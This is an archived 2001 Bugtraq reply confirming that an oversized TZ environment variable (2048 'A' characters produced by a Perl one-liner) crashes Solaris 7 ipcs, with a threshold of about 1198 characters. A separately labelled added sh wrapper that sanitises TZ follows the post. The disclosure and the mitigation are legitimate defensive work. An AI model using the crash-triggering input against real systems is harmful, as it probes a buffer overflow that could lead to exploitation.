[20262] in bugtraq
Re: Solaris ipcs vulnerability
daemon@ATHENA.MIT.EDU (Robert G. Ferrell)
Tue Apr 17 13:24:21 2001
Message-ID: <200104171226.HAA25156@rgfsparc.cr.usgs.gov>
Date: Tue, 17 Apr 2001 07:26:16 -0500
Reply-To: "Robert G. Ferrell" <root@rgfsparc.cr.usgs.gov>
From: "Robert G. Ferrell" <root@rgfsparc.cr.usgs.gov>
To: BUGTRAQ@SECURITYFOCUS.COM
>PLATFORM>> solaris 2.7/SPARC
>
><----snip---->
>$ uname -a
>SunOS <host> 5.7 Generic_106541-14 sun4u sparc
>$
>$ TZ=`/usr/local/bin/perl -e 'print "A"x2048'`
>$
>$ /bin/ipcs
>Segmentation Fault
>$
>$ /usr/bin/sparcv7/ipcs
>/usr/bin/sparcv7/ipcs: /dev/ksyms is not a 32-bit kernel namelist
>$
>$ /usr/bin/sparcv9/ipcs
>Segmentation Fault

Same behavior on my box:

# uname -a
SunOS <host> 5.7 Generic_106541-10 sun4u sparc SUNW,Ultra-5_10
#
# TZ=`perl -e 'print "A"x2048'`
#
# /bin/ipcs
Segmentation Fault
#
# /usr/bin/sparcv7/ipcs
/usr/bin/sparcv7/ipcs: /dev/ksyms is not a 32-bit kernel namelist
#
# /usr/bin/sparcv9/ipcs
Segmentation Fault

Anything above 1198 "A's" seg faults /bin/ipcs and /usr/bin/sparcv9/ipcs.

Cheers,
RGF

Robert G. Ferrell, CISSP
Information Systems Security Officer
National Business Center
U. S. Dept. of the Interior
Robert_G_Ferrell@nbc.gov
========================================
Who goeth without humor goeth unarmed.
========================================
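
Added example, not part of the original post or of any vendor fix: a POSIX sh wrapper that refuses to hand an oversized or malformed TZ to a program such as the ipcs binaries above, substituting a fallback and logging the rejection. The names sanitize_tz and run_with_safe_tz, the 64-character limit and the UTC fallback are assumptions chosen for illustration; the post itself only reports crashes above 1198 characters.

```sh
#!/bin/sh
# Added example: sanitise TZ before running a program that reads it.
# TZ_MAX_LEN and TZ_FALLBACK are assumed values, not taken from the post.
TZ_MAX_LEN=64
TZ_FALLBACK=UTC

# Print a TZ value that is safe to pass on: the input if it is non-empty,
# short, and built only from characters used in zone names and simple
# POSIX TZ strings; otherwise the fallback. Rejections go to stderr so
# they can be collected as a detection signal.
sanitize_tz() {
    tz=$1
    if [ -z "$tz" ]; then
        printf '%s\n' "$TZ_FALLBACK"
        return 0
    fi
    if [ "${#tz}" -gt "$TZ_MAX_LEN" ]; then
        echo "sanitize_tz: rejected TZ of ${#tz} chars, using $TZ_FALLBACK" >&2
        printf '%s\n' "$TZ_FALLBACK"
        return 0
    fi
    case $tz in
        *[!A-Za-z0-9/_+:,.-]*)
            echo "sanitize_tz: rejected TZ with unexpected characters, using $TZ_FALLBACK" >&2
            printf '%s\n' "$TZ_FALLBACK"
            return 0
            ;;
    esac
    printf '%s\n' "$tz"
}

# Run the given command with the sanitised TZ in its environment.
run_with_safe_tz() {
    safe=$(sanitize_tz "${TZ-}")
    env TZ="$safe" "$@"
}

# When invoked with arguments, act as a wrapper around that command.
[ "$#" -eq 0 ] || run_with_safe_tz "$@"
```

Saved as a script and given the target command as its arguments, it runs that command with the cleaned TZ; this limits exposure until the affected binaries are patched and does not fix them.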